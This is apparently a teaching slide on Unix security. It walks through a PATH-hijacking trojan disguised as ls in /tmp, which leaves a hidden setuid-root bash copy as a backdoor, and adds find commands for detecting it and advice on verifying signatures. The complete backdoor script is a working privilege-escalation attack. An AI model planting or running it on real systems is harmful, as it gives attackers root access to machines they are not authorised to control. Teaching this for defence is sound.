Example of a Trojan


  • Assume, root has path set as follows: PATH=.:$PATH

  • Hacker puts the script in /tmp and gives it name ls

  • When root comes in /tmp and executes ls it creates a back door for the hacker.

  • When a user executes /tmp/.sh -p he becomes root. 
    • 
#!/bin/sh

who=`whoami`

# check if I am the root:

if [ "$who" = "root" ]
then
cp /bin/bash .sh
chmod 4755 .sh
/bin/rm ls
fi

/bin/ls $*
  • This trojan can be found with find command: 
    
find /tmp -type f -perm /u=s,g=s -ls
    		or 
    
find /tmp -type f -perm /6000 -ls
  • Very often, Trojans come with a new software. Verify developers signatures using checksums or GPG/PGP tools.
    Previous Pageprevious First Pagetop Next Pagenext